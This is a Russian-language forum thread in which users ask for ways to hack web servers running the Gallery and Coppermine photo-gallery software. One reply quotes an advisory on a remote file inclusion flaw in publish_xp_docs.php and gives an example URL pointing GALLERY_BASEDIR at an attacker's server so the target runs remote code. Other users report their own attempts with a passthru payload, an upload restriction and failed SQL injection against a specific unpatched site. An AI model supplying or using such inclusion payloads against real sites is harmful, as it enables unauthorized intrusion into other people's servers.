|
Уязвимости Gallery v1.4.1
Может это и не совсем форум, но я даже не знаю к чему это отнести. Прошу рассказать о знаниях по поводу Powered by Gallery v1.4.1. Если есть методы по взлому - прошу поделиться.
|
Уязвимость обнаружена в 1.3.2. И поэтому тебе это врятли поможет но навсякий случай попробуй.
Gallery – система управления изображениями от http://gallery.sourceforge.net. Gallery v1.3.2 содержит новую особенность, которая позволяет пользователям публиковать изображения Web сайте, используя систему публикации Windows XP Publishing subsystem. Обнаруженная уязвимость в этой особенности (а точнее в сценарии publish_xp_docs.php) позволяет злонамеренному пользователю обработать URL таким образом, что он может получить удаленный доступ к Web серверу с привилегиями Web сервера. Пример: http://hostname/gallery/publish_xp_docs.php? GALLERY_BASEDIR=http://your.evil.server.tdl/ |
такая тема - какие версии только не пробовал, резальт один:
Fatal error: Call to undefined function: _() in /home/users/gallery/htdocs/publish_xp_docs.php on line 28 это типа пат4енная, или на своей стороне нужно по-особому index.php сосотавить (у меня простой passthru был)??? |
Это версия более новаю и у нее пока багов не нашли
|
Ой блин да простят меня все за то что я такое старьё поднял но у меня тут вопрос ребром встал а баги как таковой не нашол интересует Coppermine Photo Gallery v1.3.2 перерыл всё а толком ничего нету галлерея вроде не патченная но файла publish_xp_docs.php и xp_publish.php нема =(
|
|
Ага не помогает
|
Из разрешённых на заливку файлов только формат .jpg остальное всё в топке (запрещено) sql иньекция не катит =(
сплойт себя немного странно повёл но результат 1 файла с которым работает сплойт нет на серваке =( Также к слову там установленна Код:
Axis 2120 Network Camera 2.30 |
| Время: 23:21 |